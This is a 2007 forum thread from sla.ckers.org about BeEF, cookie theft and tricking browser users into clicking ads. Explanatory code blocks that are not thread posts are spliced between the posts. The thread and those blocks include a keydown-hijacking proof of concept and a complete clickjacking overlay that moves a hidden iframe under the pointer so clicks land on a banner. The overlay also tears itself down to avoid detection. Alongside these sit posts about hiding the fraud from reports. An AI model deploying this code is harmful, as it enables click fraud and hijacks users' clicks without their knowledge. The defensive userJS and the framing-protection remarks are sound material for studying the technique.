Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
beef shell
Posted by: lobas
Date: January 15, 2007 07:49AM

Via BeEF, if you have infected a page the victim is browsing, for instance

http://attacker.com

can you somehow, with the JavaScript command,
load http://gmail.google.com//
into a hidden iframe and then steal the cookie?
I've had no success with this.

I guess you need an XSS on Gmail.

Re: beef shell
Posted by: Tribute
Date: January 15, 2007 08:20AM

You'd need an XSS on Google, as you can't grab contents from iframes that are on a different domain from the one your page containing the iframe is on.

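The check Tribute is describing, as an added example that is not part of the thread: the browser compares the origin (scheme, host and port) of the framing page and the framed document and refuses cross-origin DOM access, so a hidden iframe of gmail.google.com on attacker.com yields no cookie. The URLs and the stub frame windows in the usage below are constructed for illustration.

```javascript
// Added example (not from the thread): the same-origin check that stops a
// page on attacker.com from reading anything, cookies included, out of a
// hidden iframe showing gmail.google.com. The URLs are constructed for
// illustration.

// The origin of a URL as browsers compute it (RFC 6454): scheme, host and
// port, with the scheme's default port filled in when none is given.
function originOf(url) {
  var u = new URL(url);
  var defaultPort = { "http:": "80", "https:": "443" };
  var port = u.port || defaultPort[u.protocol] || "";
  return u.protocol + "//" + u.hostname.toLowerCase() + ":" + port;
}

// True only when scheme, host and port all match.
function sameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// What a script in the framing page sees when it tries to read the framed
// document's cookie. frameWindow is an <iframe>'s contentWindow (or, for a
// test outside a browser, any object exposing a document): cross-origin
// access throws a SecurityError before any data comes back; same-origin
// access succeeds.
function tryReadFrameCookie(frameWindow) {
  try {
    return { ok: true, cookie: frameWindow.document.cookie };
  } catch (e) {
    return { ok: false, error: e && e.name ? e.name : String(e) };
  }
}
```

Script injected into Gmail itself (the XSS Tribute refers to) runs with Gmail's origin, which is the only reason document.cookie is readable from it; the iframe on its own gains nothing, and a cookie flagged HttpOnly is not readable from script even then.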
Re: beef shell
Posted by: lobas
Date: January 15, 2007 11:26AM

A lot of these tools also say "for fun and for profit". I don't see where the profit bit takes place; you can't exactly click ads with them.

Re: beef shell
Posted by: rsnake
Date: January 15, 2007 05:17PM

There is lots of profit depending on what you want to do. Forcing people to click on ads instead of the other links on a page is simple enough, but more likely phishing, stealing account information to sell on the street, industrial espionage, etc... etc...

- RSnake
Gotta love it. http://ha.ckers.org

Re: beef shell
Posted by: lobas
Date: January 15, 2007 05:31PM

Hmm, I don't think it's possible to force them to click the ads; you can't control the mouse or clicks via the browser?

Re: beef shell
Posted by: rsnake
Date: January 15, 2007 10:07PM

no, but you can put your banner immediately below the mouse pointer as it moves in JavaScript. :)

- RSnake
Gotta love it. http://ha.ckers.org

Re: beef shell
Posted by: lobas
Date: January 16, 2007 04:10AM

Do you have code for this? Can you show me, please? I've only ever done this with a search box, never been able to do it with anything else.

Re: beef shell
Posted by: hasse
Date: January 16, 2007 09:22AM

lobas Wrote:
-------------------------------------------------------
> alot of these tools also say for fun and for
> profit i dont see the profit bit where that takes
> places? u cant exactly click adds with them


Well it's probably just because of the paper "Smashing the stack for fun and profit". Often people just add "for fun and profit" to whatever they created.

Even though you could probably profit from it somehow.




Re: beef shell
Posted by: rsnake
Date: January 16, 2007 06:46PM

Lobas: http://ha.ckers.org/weird/followmouse.html

- RSnake
Gotta love it. http://ha.ckers.org

Re: beef shell
Posted by: Kyran
Date: January 16, 2007 07:00PM

"You did it!"

- Kyran

Re: beef shell
Posted by: rsnake
Date: January 16, 2007 07:01PM

Improved it to show it can use an iframe. Bewm.

Re: beef shell
Posted by: Kyran
Date: January 16, 2007 07:11PM

Always the Opera advocate, I wrote a quick userJS to block the function followmouse. I'll write a more advanced one to remove this sort of thing completely later. I'm more so just glad that this won't be a big issue for me if I ever find it out in the wild.

// Opera User JavaScript: defineMagicFunction(name, impl) replaces any
// global function the page defines under that name with impl.
window.opera.defineMagicFunction(
    'followmouse',
    function () {
        document.write('followmouse removed');
    }
);

- Kyran

Re: beef shell
Posted by: rsnake
Date: January 16, 2007 09:19PM

Remind me to code around that when I write hack_kyran.js ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: beef shell
Posted by: Kyran
Date: January 16, 2007 10:03PM

Uh oh.
*adds line to urlfilter.ini*

[exclude]
*/hack_kyran.js

;D

- Kyran

Re: beef shell
Posted by: digi7al64
Date: January 17, 2007 12:43AM

nice work rsnake.

I have been trying something similar for some time with no luck (except the following), which
> Waits for a keydown event and traps it
> Set focus to the link i want clicked
> Converts the keydown keycode into a click (enter)
> returns the keycode to the browser
which then "clicks" the link for me.

POC
<html>
<head>
<script type="text/javascript">
document.onkeydown = ClickIt;

function ClickIt(e) {
	e = e || window.event;                    // DOM event object, or IE's global event
	var keycode = e.keyCode || e.which;       // the key the victim actually pressed
	document.getElementById("linkage").focus();   // move focus onto the link
	// Rewrite the trapped key as Enter (13) so the focused link is activated.
	// This relied on IE letting script overwrite keyCode; current browsers
	// treat it as read-only, so the assignment has no effect there.
	e.keyCode = 13;
	return e.keyCode;                         // hand the (rewritten) key back to the browser
}
</script>
</head>
<body>
<a href="http://ha.ckers.org" id="linkage">Hackers</a>
</body>
</html>

I have a couple more ideas up my sleeve, but that is for another day when I have a better POC.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: beef shell
Posted by: lobas
Date: January 17, 2007 06:26AM

I've tried onload; it doesn't work though.

Re: beef shell
Posted by: rsnake
Date: January 17, 2007 02:19PM

I updated the code so it's a little more obvious how it would work.... now it uses a semi-transparent layer, and an image. It's still crappy in IE, but it works great in Firefox. http://ha.ckers.org/weird/followmouse.html

I was having trouble updating the styles in real time so I opted towards a layer with a high opacity. I accidentally messed up at one point and found myself on my own homepage in the iframe (404's point to the homepage) and as a result I almost clicked on a banner ad myself (since they are on the top of the page). It works great, even in tests (at least in Firefox).

- RSnake
Gotta love it. http://ha.ckers.org

Re: beef shell
Posted by: lobas
Date: January 17, 2007 03:47PM

Very cool, rsnake. Is there any way, once the banner is clicked, to not actually open the ad? Maybe override the loading page with body onload; this method is very easy to get reported.

Re: beef shell
Posted by: Tribute
Date: January 17, 2007 05:36PM

Couldn't you cause the ad to load in a 1x1px or hidden iframe, so that when it's clicked upon you see no difference, as the page you are on doesn't change?

Re: beef shell
Posted by: rsnake
Date: January 17, 2007 06:28PM

lobas, it's in an iframe, so it shouldn't pop anything up... the alert box is there on purpose so you can see what's going on.

Tribute, normally all of that would be hidden. I was just showing the alert box and the semi-visible layer so you could tell what I was doing with the iframe. I guess that's confusing people.

- RSnake
Gotta love it. http://ha.ckers.org

Re: beef shell
Posted by: Kyran
Date: January 17, 2007 06:29PM

I'm sure you could get it to load in the already hidden iframe and just drop the followmouse function after that.

Edit: Nevermind, rsnake said it better.

- Kyran




Re: beef shell
Posted by: lobas
Date: January 18, 2007 07:03AM

It's a cool method, but for it to be foolproof and not get reported, somehow the banner, once clicked, needs to be opened within a hidden 0px/0px iframe, and then the script disabled, maybe by loading a legit page.

Re: beef shell
Posted by: rsnake
Date: January 18, 2007 09:25PM

You can't trap the onmousedown event once you are clicking in an iframe as far as I know. So you would be arbitrarily removing it. You can easily hide it from loading because you have control over the div which has the relative opacity built into it. However, you can make it remove the script after a certain amount of time or something, via redirection or a document.write. If they haven't clicked after 10 seconds it's probably safe to assume it's okay to get rid of the script.

- RSnake
Gotta love it. http://ha.ckers.org

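The mechanism RSnake describes in this thread, a layer that moves with the pointer with an iframe underneath it so that a click on the visible page lands on a banner inside the frame, together with his later suggestion of taking the script down after a timeout, as an added example. This is not his followmouse.html and not code from the thread; the TARGET offsets, the OVERLAY size, the frame URL and the 10 s timeout are assumed values for illustration, and the document and timer functions are passed in so the logic can be exercised outside a browser.

```javascript
// Added example: a minimal "follow the mouse" overlay of the kind RSnake
// describes (not his followmouse.html). A near-invisible, absolutely
// positioned <div> containing an <iframe> is repositioned on every mousemove
// so that a chosen spot inside the framed page sits under the pointer; a
// click intended for the visible page then lands inside the frame. The timed
// teardown is the "remove the script after N seconds" idea from later in the
// thread. TARGET, OVERLAY, the frame URL and the timeout are assumed values.

// Where the click target sits inside the framed page, in CSS pixels from the
// frame's top-left corner (assumed: a banner near the top of the page).
var TARGET = { x: 120, y: 40 };

// Size of the overlay. Small, so the covered region is hard to notice.
var OVERLAY = { width: 300, height: 100 };

// Pure positioning: the overlay's top/left such that TARGET is exactly under
// the pointer at viewport coordinates (clientX, clientY).
function overlayPositionFor(clientX, clientY, target, scroll) {
  scroll = scroll || { x: 0, y: 0 };
  return {
    left: clientX + scroll.x - target.x,
    top: clientY + scroll.y - target.y
  };
}

// Does page point (x, y) fall on an overlay of the given size placed at pos?
// Handy for checking which clicks the hidden frame would swallow.
function overlayCovers(pos, size, x, y) {
  return x >= pos.left && x < pos.left + size.width &&
         y >= pos.top && y < pos.top + size.height;
}

// Build the overlay and install the mousemove handler. In a real page call
// installFollowMouse(document, url, 10000); the timers argument exists only
// so the teardown can be driven from a test.
function installFollowMouse(doc, frameUrl, ttlMs, timers) {
  timers = timers || {
    set: function (fn, ms) { return setTimeout(fn, ms); },
    clear: function (h) { clearTimeout(h); }
  };

  var div = doc.createElement("div");
  var frame = doc.createElement("iframe");
  frame.src = frameUrl;
  frame.width = OVERLAY.width;
  frame.height = OVERLAY.height;
  frame.style.border = "0";
  div.style.position = "absolute";
  div.style.opacity = "0.02";        // almost invisible, but still clickable
  div.style.zIndex = "2147483647";   // above everything else on the page
  div.appendChild(frame);
  doc.body.appendChild(div);

  function onMove(e) {
    var scroll = {
      x: doc.documentElement.scrollLeft || 0,
      y: doc.documentElement.scrollTop || 0
    };
    var pos = overlayPositionFor(e.clientX, e.clientY, TARGET, scroll);
    div.style.left = pos.left + "px";
    div.style.top = pos.top + "px";
  }
  doc.addEventListener("mousemove", onMove);

  function teardown() {
    doc.removeEventListener("mousemove", onMove);
    if (div.parentNode) div.parentNode.removeChild(div);
  }
  // If nothing has happened after ttlMs, take the overlay down so that a
  // later look at the page finds nothing unusual.
  var handle = timers.set(teardown, ttlMs);

  return { teardown: teardown, cancelTimer: function () { timers.clear(handle); } };
}
```

Two caveats a practitioner will hit. Once the pointer is over the frame, mousemove and click events go to the framed document, not to the parent, so the overlay can only be repositioned while the pointer is still over the parent page and nothing in the parent sees the click; this is the limit RSnake mentions for onmousedown. And the framed site has the final say: a site that refuses to be framed (X-Frame-Options, or the frame-ancestors directive of Content-Security-Policy) never renders inside the overlay at all, which is the standard defence against this technique.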

